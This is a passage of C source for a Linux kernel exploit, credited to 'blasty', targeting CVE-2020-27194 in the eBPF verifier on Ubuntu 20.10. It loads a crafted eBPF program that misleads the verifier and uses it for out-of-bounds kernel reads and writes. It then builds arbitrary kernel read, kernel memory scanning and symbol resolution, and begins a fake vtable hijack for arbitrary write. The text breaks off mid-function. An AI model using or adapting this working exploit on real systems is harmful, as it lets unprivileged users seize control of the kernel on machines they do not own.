/* 
 * blasty-vs-ebpf.c -- by blasty <peter@haxx.in> 
 * =============================================
 *
 * the Linux eBPF verifier, the gift that keeps on giving.
 * 
 * exploit for CVE-2020-27194, discovered by Simon Scannell[1] 
 * exploit strategy shamelessly lifted from Manfred Paul[2]
 *
 * this wouldn't exist if it weren't for the gentlemen listed
 * above. this was mostly a crash course in (e)BPF for me personally. ;)
 *
 * this is not the most polished piece of work right now, feel free to
 * send me a revised copy. only tested on Ubuntu Groovy (20.10, 5.8.0-25-generic)
 * as of writing.
 *
 * enjoy!
 *
 * -- blasty // 20201104
 * 
 * [1] https://scannell.me/fuzzing-for-ebpf-jit-bugs-in-the-linux-kernel/
 * [2] https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-
 *     privilege-escalation-via-improper-ebpf-program-verification
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <linux/bpf.h>
#include <linux/unistd.h>

// offset (within the oversized map value) where the fake bpf_map_ops
// vtable gets embedded, and the same offset expressed as a u64 index
#define MAP_VTAB_OFFSET               0x20
#define MAP_VTAB_IDX                  (MAP_VTAB_OFFSET/8)
// sizeof(struct bpf_map) on the target kernel (5.8, Ubuntu 20.10)
#define BPF_MAP_SIZE                  0x110
// translate a field offset within struct bpf_map into the backwards
// distance the OOB BPF program subtracts from the value pointer
#define OOB_MAP_OFFSET(x)             (BPF_MAP_SIZE - x)

// field offsets inside struct bpf_map (kernel-version specific)
#define BPF_MAP_MAP_OPS_OFF           0x00
#define BPF_MAP_MAP_TYPE_OFF          0x18
#define BPF_MAP_MAX_ENTRIES_OFF       0x24
#define BPF_MAP_SPINLOCK_OFF          0x2c
#define BPF_MAP_BTF_OFF               0x40

// number of function pointers in struct bpf_map_ops, and the indices
// of the push_elem / get_next_key entries we swap around
#define BPF_MAP_OPS_COUNT             37
#define BPF_MAP_OPS_PUSH_ELEM_IDX     14
#define BPF_MAP_OPS_GET_NEXT_KEY_IDX  4

#define LOG_BUF_SIZE                  65536
#define VALUE_SIZE                    0x2000

// logging helpers; error() is fatal (see report())
#define info(fmt, args...) report('$', false, fmt, ## args)
#define infov(fmt, args...) report('~', false, fmt, ## args)
#define error(fmt, args...) report('!', true, fmt, ## args)
#define info_value64(name, value) infov("%-24s: %016lx", name, value)

// command codes passed from userland (via element 0 of the array map)
// to the malicious eBPF program, selecting which OOB primitive to run
enum operation_type {
    OPERATION_INVALID = 0,
    OPERATION_READ32,   // 32-bit OOB read relative to the map value
    OPERATION_READ64,   // 64-bit OOB read
    OPERATION_WRITE32,  // 32-bit OOB write
    OPERATION_WRITE64,  // 64-bit OOB write
    OPERATION_HAXMAP    // patch our own bpf_map header (type/entries/lock)
};

// hand-rolled eBPF instruction encoders (equivalents of the kernel's
// include/linux/filter.h helpers), so we don't need libbpf

// memory load: DST = *(SIZE *)(SRC + OFF)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)             \
    ((struct bpf_insn) {                             \
     .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,    \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = OFF,                                   \
     .imm   = 0 })

// memory store from register: *(SIZE *)(DST + OFF) = SRC
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)             \
    ((struct bpf_insn) {                             \
     .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,    \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = OFF,                                   \
     .imm   = 0 })

// conditional jump, immediate operand: if (DST op IMM) pc += OFF
#define BPF_JMP_IMM(OP, DST, IMM, OFF)               \
    ((struct bpf_insn) {                             \
     .code  = BPF_JMP | BPF_OP(OP) | BPF_K,          \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = OFF,                                   \
     .imm   = IMM })

// 32-bit move immediate (zero-extends into the full register)
#define BPF_MOV32_IMM(DST, IMM)                      \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU | BPF_MOV | BPF_K,             \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = IMM })

// program exit; return value is whatever is in R0
#define BPF_EXIT_INSN()                              \
    ((struct bpf_insn) {                             \
     .code  = BPF_JMP | BPF_EXIT,                    \
     .dst_reg = 0,                                   \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = 0 })

// 64-bit load immediate (expands to a two-insn pair)
#define BPF_LD_IMM64(DST, IMM)                       \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)              \
    ((struct bpf_insn) {                             \
     .code  = BPF_LD | BPF_DW | BPF_IMM,             \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = 0,                                     \
     .imm   = (__u32) (IMM) }),                      \
    ((struct bpf_insn) {                             \
     .code  = 0,                                     \
     .dst_reg = 0,                                   \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = ((__u64) (IMM)) >> 32 })

// conditional jump, register operand: if (DST op SRC) pc += OFF
#define BPF_JMP_REG(OP, DST, SRC, OFF)               \
    ((struct bpf_insn) {                             \
     .code  = BPF_JMP | BPF_OP(OP) | BPF_X,          \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = OFF,                                   \
     .imm   = 0 })

// load a map fd as a pseudo map pointer (resolved by the verifier)
#define BPF_LD_MAP_FD(DST, MAP_FD)                   \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

// 64-bit register-to-register move
#define BPF_MOV64_REG(DST, SRC)                      \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU64 | BPF_MOV | BPF_X,           \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = 0,                                     \
     .imm   = 0 })

// raw instruction, used here for BPF_CALL of helper functions
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)       \
    ((struct bpf_insn) {                             \
     .code  = CODE,                                  \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = OFF,                                   \
     .imm   = IMM })

// 64-bit ALU op with immediate: DST = DST op IMM
#define BPF_ALU64_IMM(OP, DST, IMM)                  \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,        \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = IMM })

// memory store of an immediate: *(SIZE *)(DST + OFF) = IMM
#define BPF_ST_MEM(SIZE, DST, OFF, IMM)              \
    ((struct bpf_insn) {                             \
     .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,     \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = OFF,                                   \
     .imm   = IMM })

// 32-bit register-to-register move (zero-extends)
#define BPF_MOV32_REG(DST, SRC)                      \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU | BPF_MOV | BPF_X,             \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = 0,                                     \
     .imm   = 0 })

// 64-bit move immediate (sign-extends the 32-bit imm)
#define BPF_MOV64_IMM(DST, IMM)                      \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU64 | BPF_MOV | BPF_K,           \
     .dst_reg = DST,                                 \
     .src_reg = 0,                                   \
     .off   = 0,                                     \
     .imm   = IMM })

// 64-bit ALU op with register operand: DST = DST op SRC
#define BPF_ALU64_REG(OP, DST, SRC)                  \
    ((struct bpf_insn) {                             \
     .code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,        \
     .dst_reg = DST,                                 \
     .src_reg = SRC,                                 \
     .off   = 0,                                     \
     .imm   = 0 })

// prototypes
// prototypes
uint64_t read64(uint64_t addr);
uint32_t read32(uint64_t addr);

// snapshot of the original bpf_map header fields we clobber, so
// arb_write_uninstall() can restore them
typedef struct {
    uint64_t map_ops_ptr;   // struct bpf_map_ops *
    uint32_t spin_lock_off;
    uint32_t max_entries;
    uint32_t map_type;
} bpfmap_orig_t;

// globals
char g_bpf_log_buf[LOG_BUF_SIZE];          // verifier log output
uint64_t g_fake_vtab[BPF_MAP_OPS_COUNT];   // crafted copy of bpf_map_ops
int g_mapfd;                               // fd of the abused array map
int g_sockets[2];                          // socketpair; [1] has the BPF filter attached
int g_fake_vtab_enabled = 0;               // embed g_fake_vtab into map values?
bpfmap_orig_t g_bpfmap_orig;

// radix tree code carefully lifted from the kernel source,
// and hacked up to work from userland with the read primitives

// low two bits of a radix tree entry encode its kind; "internal"
// entries (tag 2) point at another xa_node level
#define RADIX_TREE_ENTRY_MASK 3UL
#define RADIX_TREE_INTERNAL_NODE 2UL

// sentinel meaning "slot being rebuilt, retry the lookup from the root"
#define XA_RETRY_ENTRY xa_mk_internal(256)
#define RADIX_TREE_RETRY XA_RETRY_ENTRY

// 64 slots per node -> 6 index bits consumed per tree level
#define XA_CHUNK_SHIFT 6
#define XA_CHUNK_SIZE (1UL << XA_CHUNK_SHIFT)
#define RADIX_TREE_MAP_SHIFT XA_CHUNK_SHIFT
#define RADIX_TREE_MAP_SIZE (1UL << RADIX_TREE_MAP_SHIFT)
#define RADIX_TREE_MAP_MASK (RADIX_TREE_MAP_SIZE-1)

// the kernel's radix tree is implemented on top of the xarray
#define radix_tree_root xarray
#define radix_tree_node xa_node

// we only need the layout, not the locking semantics
#define spinlock_t int
#define gfp_t int

struct list_head {
    struct list_head *next, *prev;
};

struct rcu_head {
    struct rcu_head *next;
    void (*func)(struct rcu_head *head);
};

// mirror of the kernel's struct xa_node layout; only used to compute
// field offsets -- actual accesses go through read32()/read64()
struct xa_node {
    unsigned char shift;
    unsigned char offset;
    unsigned char count;
    unsigned char nr_values;
    struct xa_node *parent;
    struct xarray *array;
    union {
        struct list_head private_list;
        struct rcu_head rcu_head;
    };
    void *slots[XA_CHUNK_SIZE];
};

struct xarray {
    spinlock_t xa_lock;
    gfp_t xa_flags;
    void* xa_head;
};

/* Tag a value as an xarray "internal" entry: shift it up two bits and
 * set the tag bit, mirroring the kernel's xa_mk_internal(). */
static inline void *xa_mk_internal(uint64_t v) {
    uint64_t tagged = v << 2;
    tagged |= 2;
    return (void *)tagged;
}

/* Strip the internal-node tag bit from a radix tree entry, yielding
 * the raw xa_node pointer. */
static inline struct radix_tree_node *entry_to_node(void *ptr) {
    uint64_t raw = (uint64_t)ptr;
    raw &= ~RADIX_TREE_INTERNAL_NODE;
    return (struct radix_tree_node *)raw;
}

/* Inverse of entry_to_node(): mark a node pointer as an internal
 * entry by setting the tag bit. */
static inline void *node_to_entry(void *ptr) {
    uint64_t tagged = (uint64_t)ptr;
    tagged |= RADIX_TREE_INTERNAL_NODE;
    return (void *)tagged;
}

/* Largest index reachable through a node with the given shift:
 * (slots-per-node << shift) - 1. */
static inline uint64_t shift_maxindex(unsigned int shift) {
    uint64_t span = RADIX_TREE_MAP_SIZE << shift;
    return span - 1;
}

/* True when the low two bits of the entry carry the "internal node"
 * tag (i.e. the entry points at another tree level, not a value). */
static inline bool radix_tree_is_internal_node(void *ptr) {
    uint64_t tag = (uint64_t)ptr & RADIX_TREE_ENTRY_MASK;
    return tag == RADIX_TREE_INTERNAL_NODE;
}

/* Max index covered by a (kernel-resident) node: fetch its `shift`
 * byte via the kernel-read primitive, then compute the span. */
static inline uint64_t node_maxindex(const struct radix_tree_node *node) {
    unsigned int shift = read32((uint64_t)node) & 0xff;
    return shift_maxindex(shift);
}

/*
 * Userland port of the kernel's radix_tree_load_root(): fetch the root
 * entry of the tree at kernel address `root_addr` using the read
 * primitives instead of direct dereferences.
 *
 * Stores the (possibly tagged) root entry in *nodep and the maximum
 * index the tree can hold in *maxindex. Returns the root node's shift
 * plus RADIX_TREE_MAP_SHIFT, or 0 for an empty/leaf root.
 */
static unsigned radix_tree_load_root(
    uint64_t root_addr, struct radix_tree_node **nodep, uint64_t *maxindex
) {
    // xa_head sits at offset 8 of struct xarray (after xa_lock/xa_flags)
    struct radix_tree_node *node = (struct radix_tree_node*)read64(root_addr+8);

    *nodep = node;

    if (radix_tree_is_internal_node(node)) {
        node = entry_to_node(node);
        *maxindex = node_maxindex(node);
        // first byte of struct xa_node is `shift`
        return (read32((uint64_t)node) & 0xff) + RADIX_TREE_MAP_SHIFT;
    }

    *maxindex = 0;
    return 0;
}

/*
 * Descend one tree level: select the child slot of `parent` covering
 * `index` and read the slot's entry from kernel memory into *nodep.
 * Returns the slot offset. slots[] begins at offset 0x28 of xa_node.
 */
static unsigned int radix_tree_descend(
    const struct radix_tree_node *parent,
    struct radix_tree_node **nodep, uint64_t index
) {
    // parent's first byte is its `shift`; mask selects 6 index bits
    unsigned int offset = 
        (index >> (read32((uint64_t)parent)&0xff)) & RADIX_TREE_MAP_MASK;
    void **entry = (void**)read64((uint64_t)(parent) + 0x28 + (offset * 8));
    *nodep = (void *)entry;
    return offset;
}

/*
 * Look up `index` in the radix tree rooted at kernel address
 * `root_addr`, walking node levels via the kernel-read primitives.
 * Returns the stored entry (a kernel pointer) or NULL if out of range.
 * A RADIX_TREE_RETRY sentinel restarts the walk from the root.
 */
void *radix_tree_lookup(uint64_t root_addr, uint64_t index) {
    struct radix_tree_node *node, *parent;
    uint64_t maxindex;

restart:
    parent = NULL;
    radix_tree_load_root(root_addr, &node, &maxindex);
    if (index > maxindex)
        return NULL;

    while (radix_tree_is_internal_node(node)) {
        parent = entry_to_node(node);
        radix_tree_descend(parent, &node, index);
        if (node == RADIX_TREE_RETRY)
            goto restart;
        // shift == 0 means `parent` was the bottom level; `node` is a leaf
        if ((read32((uint64_t)parent)&0xff) == 0)
            break;
    }

    return node;
}

// end of radix tree crap

/* Print the exploit banner to stdout. */
void header() {
    static const char *banner =
        "\n"
        "      $$$ Linux 5.8.15+ CVE-2020-27194 exploit  $$$\n"
        "            -- by blasty <peter@haxx.in> --\n\n";
    fputs(banner, stdout);
}

/*
 * Print a tagged log line: "[<indicator>] <message>". Errors go to
 * stderr with an "ERROR: " prefix and terminate the process; info
 * lines go to stdout.
 */
void report(char indicator, bool error, const char *fmt, ...) {
    FILE *out = error ? stderr : stdout;
    va_list args;

    fprintf(out, "[%c] %s", indicator, error ? "ERROR: " : "");

    va_start(args, fmt);
    vfprintf(out, fmt, args);
    va_end(args);

    fprintf(out, "\n");

    // every error is fatal by design
    if (error) {
        exit(-1);
    }
}

/*
 * Set up the exploit machinery:
 *   1. create a 1-element BPF array map with a VALUE_SIZE byte value
 *      (our command channel + scratch space),
 *   2. load a SOCKET_FILTER program whose bounds the verifier
 *      mis-tracks (CVE-2020-27194), giving us an OOB read/write
 *      relative to the map value,
 *   3. attach it to one end of a socketpair so writing to the other
 *      end runs the program on demand.
 *
 * Returns 0 on success; any failure is fatal via error().
 */
int bpf_hax_init() {
    int ret;

    union bpf_attr attr_create = {
        .map_type = BPF_MAP_TYPE_ARRAY,
        .key_size = sizeof(int),
        .value_size = VALUE_SIZE,
        .max_entries = 1
    };

    ret = syscall(__NR_bpf, BPF_MAP_CREATE, &attr_create, sizeof(attr_create));

    if (ret < 0) {
        error("failed to create map (%d)", errno);
    }

    g_mapfd = ret;

    struct bpf_insn oob_prog[]={
        // R0 = lookup of key 0 in our map; bail out if NULL
        BPF_LD_MAP_FD(BPF_REG_9, g_mapfd),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),

        // R5 = buf[0]: userland always stores 2 here (see bpf_hax_oob)
        BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_0, 0),

        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,  8), // R7 = oob_operation
        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 16), // R8 = offset
        BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 24), // R9 = value

        // bound R5 to (0, 0x600000002): the buggy 32-bit bound tracking
        // of the verifier mishandles this range (CVE-2020-27194)
        BPF_LD_IMM64(BPF_REG_6, 25769803778UL),
        BPF_JMP_REG(BPF_JLT, BPF_REG_5, BPF_REG_6, 2),
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        BPF_JMP_IMM(BPF_JGT, BPF_REG_5, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // no-op OR triggers the broken scalar32 bound recomputation;
        // R3 = lower 32 bits of R5 (actual value 2), then >> 1
        BPF_ALU64_IMM(BPF_OR, BPF_REG_5, 0),
        BPF_MOV32_REG(BPF_REG_3, BPF_REG_5),
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_3, 1),

        // verifier now thinks r3 == 0, but it is infact 1, oops!
        BPF_ALU64_REG(BPF_MUL, BPF_REG_8, BPF_REG_3),

        // OPERATION_READ32?
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_READ32, 6),

        // read *(u32 *)(value - offset), store result at value[0]
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_LDX_MEM(BPF_W, BPF_REG_1, BPF_REG_0, 0),

        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // OPERATION_READ64?
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_READ64, 6),

        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),

        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // OPERATION_WRITE32?
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_WRITE32, 4),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_9, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // OPERATION_WRITE64?
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_WRITE64, 4),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_9, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // OPERATION_HAXMAP: rewrite our own bpf_map header in place:
        // clear spin_lock_off, set max_entries to -1 and retype the
        // map to BPF_MAP_TYPE_STACK (enables the push_elem vtable hijack)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, OPERATION_HAXMAP, 20),

        BPF_MOV32_IMM(BPF_REG_9, 0),
        BPF_MOV64_IMM(BPF_REG_8, OOB_MAP_OFFSET(BPF_MAP_SPINLOCK_OFF)),
        BPF_ALU64_REG(BPF_MUL, BPF_REG_8, BPF_REG_3),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_9, 0),
        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),

        BPF_MOV32_IMM(BPF_REG_9, 0xffffffff),
        BPF_MOV64_IMM(BPF_REG_8, OOB_MAP_OFFSET(BPF_MAP_MAX_ENTRIES_OFF)),
        BPF_ALU64_REG(BPF_MUL, BPF_REG_8, BPF_REG_3),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_9, 0),
        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),

        BPF_MOV32_IMM(BPF_REG_9, BPF_MAP_TYPE_STACK),
        BPF_MOV64_IMM(BPF_REG_8, OOB_MAP_OFFSET(BPF_MAP_MAP_TYPE_OFF)),
        BPF_ALU64_REG(BPF_MUL, BPF_REG_8, BPF_REG_3),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_8),
        BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_9, 0),
        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr attr_load = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insns     = (uint64_t)((void *) oob_prog),
        .insn_cnt  = sizeof(oob_prog) / sizeof(struct bpf_insn),
        .license   = (uint64_t)((void *) "GPL"),
        .log_buf   = (uint64_t)(g_bpf_log_buf),
        .log_size  = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr_load.kern_version = 0;

    g_bpf_log_buf[0] = 0;

    int progfd = syscall(__NR_bpf, BPF_PROG_LOAD, &attr_load, sizeof(attr_load));

    if (progfd < 0) {
        printf("\nlog buffer:%s\n", g_bpf_log_buf);
        error("failed to load bpf program.\n");
    }

    info("we fooled the bpf program verifier, good!");

    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, g_sockets)) {
        error("failed to create socket pair '%s'\n", strerror(errno));
    }

    // attach the filter; writing to g_sockets[0] now runs our program
    if(setsockopt(
        g_sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)
    ) < 0) {
        error("setsockopt failed '%s'\n", strerror(errno));
    }

    return 0;
}

/*
 * Execute one OOB operation through the loaded eBPF program.
 *
 * Writes an operation request into element 0 of the array map (the BPF
 * program reads it back via map_lookup_elem), then writes a dummy
 * datagram into the socketpair so the attached SOCKET_FILTER program
 * actually runs. Request layout in the map value:
 *   buf[0] = 2       (satisfies the verifier-fooling bounds checks)
 *   buf[1] = op      (enum operation_type)
 *   buf[2] = offset  (backwards reach relative to the map value)
 *   buf[3] = value   (payload for write operations)
 * When the fake vtable is armed it is embedded into the value too, so
 * it sits at a known offset inside the oversized map value.
 *
 * Returns the qword the BPF program left at buf[0] (read results),
 * or 0 for OPERATION_HAXMAP. All failures are fatal via error().
 */
uint64_t bpf_hax_oob(int op, uint16_t offset, uint64_t value) {
    uint64_t buf[VALUE_SIZE/8];

    memset(buf, 0, VALUE_SIZE);

    buf[0] = 2;
    buf[1] = op;
    buf[2] = offset;
    buf[3] = value;

    if (g_fake_vtab_enabled) {
        memcpy(buf + MAP_VTAB_IDX, g_fake_vtab, BPF_MAP_OPS_COUNT * 8);
    }

    uint64_t key = 0;

    union bpf_attr attr_update = {
        .map_fd = g_mapfd,
        .key = (uint64_t)&key,
        .value = (uint64_t)&buf,
    };

    int ret = syscall(
        __NR_bpf, BPF_MAP_UPDATE_ELEM, &attr_update, sizeof(attr_update)
    );

    if (ret != 0) {
        // error() never returns; the old exit(-1) after it was dead code
        error("%s: failed to update map (%d)", __FUNCTION__, errno);
    }

    // payload bytes are irrelevant (the write only triggers the filter),
    // but zero them so we don't ship uninitialized stack memory
    char buffer[64] = {0};

    int n = write(g_sockets[0], buffer, sizeof(buffer));

    if (n < 0) {
        perror("write");
        error("%s: write() failed", __FUNCTION__);
    }

    if (n != sizeof(buffer)) {
        error("%s: short write: %d", __FUNCTION__, n);
    }

    if (op == OPERATION_HAXMAP) {
        return 0;
    }

    // read operations leave their result in the first qword of the value
    memset(buf, 0, sizeof(buf));
    union bpf_attr attr_lookup = {
        .map_fd = g_mapfd,
        .key = (uint64_t)&key,
        .value = (uint64_t)&buf
    };

    int err = syscall(
        __NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr_lookup, sizeof(attr_lookup)
    );

    if (err != 0) {
        error("%s: BPF_MAP_LOOKUP_ELEM failed: %d", __FUNCTION__, err);
    }

    return buf[0];
}

// convenience wrappers around bpf_hax_oob(); OOB_MAP_OFFSET() turns a
// field offset within struct bpf_map into the backwards distance the
// BPF program subtracts from the map value pointer, so these read and
// write fields of our own bpf_map header

uint32_t oob_read32(uint16_t offset) {
    return bpf_hax_oob(OPERATION_READ32, OOB_MAP_OFFSET(offset), 0);
}

uint64_t oob_read64(uint16_t offset) {
    return bpf_hax_oob(OPERATION_READ64, OOB_MAP_OFFSET(offset), 0);
}

uint64_t oob_write32(uint16_t offset, uint32_t value) {
    return bpf_hax_oob(OPERATION_WRITE32, OOB_MAP_OFFSET(offset), value);
}

uint64_t oob_write64(uint16_t offset, uint64_t value) {
    return bpf_hax_oob(OPERATION_WRITE64, OOB_MAP_OFFSET(offset), value);
}

// trigger the map-header rewrite (retype to BPF_MAP_TYPE_STACK etc.)
uint64_t oob_haxmap() {
    return bpf_hax_oob(OPERATION_HAXMAP, 0, 0);
}

/*
 * Arbitrary 32-bit kernel read.
 *
 * Points our map's `btf` pointer (via the OOB write) at addr - 88,
 * then asks the kernel for map info: BPF_OBJ_GET_INFO_BY_FD copies the
 * btf object's id field into info.btf_id, which leaks the dword at
 * `addr`. The -88 compensates for the offset of the id field inside
 * struct btf on the tested 5.8 kernel -- NOTE(review): verify this
 * offset against other kernel builds.
 */
uint32_t read32(uint64_t addr) {
    struct bpf_map_info info_buf;
    memset(&info_buf, 0, sizeof(info_buf));

    union bpf_attr info_attr;
    memset(&info_attr, 0, sizeof(info_attr));

    info_attr.info.bpf_fd = g_mapfd;
    info_attr.info.info_len = sizeof(info_buf);
    info_attr.info.info = (uint64_t)&info_buf;

    oob_write64(BPF_MAP_BTF_OFF, addr - 88);

    int err = syscall(
        __NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &info_attr, sizeof(info_attr)
    );

    if (err != 0) {
        error("BPF_OBJ_GET_INFO_BY_FD failed: %d\n", err);
    }

    return info_buf.btf_id;
}

/* Arbitrary 64-bit kernel read, composed from two 32-bit reads. */
uint64_t read64(uint64_t addr) {
    uint64_t lo = read32(addr);
    uint64_t hi = read32(addr + 4);
    return (hi << 32) | lo;
}

/*
 * Read `len` bytes of kernel memory starting at `addr` into `dst`,
 * 32 bits at a time.
 *
 * Fixes over the original: uses size_t for the index (no signed/
 * unsigned comparison, no overflow for huge lengths), copies via
 * memcpy instead of a uint32_t* cast (no alignment/strict-aliasing
 * issues), and no longer writes up to 3 bytes past `dst` when `len`
 * is not a multiple of 4.
 */
void read_data(uint64_t addr, unsigned char *dst, size_t len) {
    size_t i = 0;

    // full 32-bit words
    for (; i + 4 <= len; i += 4) {
        uint32_t word = read32(addr + i);
        memcpy(dst + i, &word, 4);
    }

    // partial tail (1-3 bytes)
    if (i < len) {
        uint32_t word = read32(addr + i);
        memcpy(dst + i, &word, len - i);
    }
}

/*
 * Read one 4 KiB page of kernel memory at `addr` into `dst`.
 * (The original `return`ed a void expression, which is a constraint
 * violation in standard C; the keyword is dropped.)
 */
void read_page(uint64_t addr, unsigned char *dst) {
    read_data(addr, dst, 0x1000);
}

/*
 * Scan kernel memory page by page, starting at start_addr rounded down
 * to a page boundary, until the byte string `s` occurs; returns its
 * kernel address. NOTE: never terminates (and keeps reading forward)
 * if the string is absent -- the trailing `return 0` is unreachable.
 */
uint64_t mem_search_string(uint64_t start_addr, char *s) {
    uint8_t pagebuf[0x1000];
    start_addr &= ~0xfff;
    while(1) {
        read_page(start_addr, pagebuf);
        uint8_t *hit = (uint8_t*)memmem(pagebuf, 0x1000, s, strlen(s));
        if (hit != NULL) {
            return start_addr + (hit - pagebuf);
        }
        start_addr += 0x1000;
    }
    return 0;
}

/*
 * Naive kernel symbol resolver: find the symbol name string in memory
 * (starting the scan at start_addr), then walk backwards through what
 * is assumed to be a table of 32-bit self-relative offsets until an
 * entry points at that string; the entry just before it is taken to
 * be the symbol's address offset.
 *
 * NOTE(review): this assumes the PREL32-relocation ksymtab layout
 * (name_offset preceded by value_offset) -- confirm per kernel config.
 * Never terminates if no matching entry exists below the string.
 */
uint64_t resolve_sym_naive(uint64_t start_addr, char *s) {
    uint64_t strtab_entry = mem_search_string(start_addr, s);
    uint64_t symtab_entry = strtab_entry & ~3;
    while(1) {
        uint64_t addr = symtab_entry + read32(symtab_entry);
        symtab_entry -= 4;
        if (addr == strtab_entry) {
            break;
        }
    }
    return symtab_entry + read32(symtab_entry);
}


/*
 * Install the arbitrary-write primitive.
 *
 * Builds a fake bpf_map_ops vtable: a verbatim copy of the real ops
 * table read from kernel memory, except that the push_elem slot is
 * redirected to get_next_key. The vtable is embedded into our map
 * value (by subsequent bpf_hax_oob() calls, once g_fake_vtab_enabled
 * is set), so it lives at a known kernel address right after the map
 * header: bpf_map_addr + BPF_MAP_SIZE + MAP_VTAB_OFFSET.
 *
 * The original header fields are snapshotted into g_bpfmap_orig for
 * later restoration, then map->ops is pointed at the fake vtable and
 * oob_haxmap() retypes the map to BPF_MAP_TYPE_STACK -- after which a
 * BPF_MAP_UPDATE_ELEM reaches the hijacked push_elem (see arb_write32).
 */
void arb_write_install(uint64_t bpf_map_addr) {
    uint64_t fake_vtable_addr = bpf_map_addr + BPF_MAP_SIZE + MAP_VTAB_OFFSET;
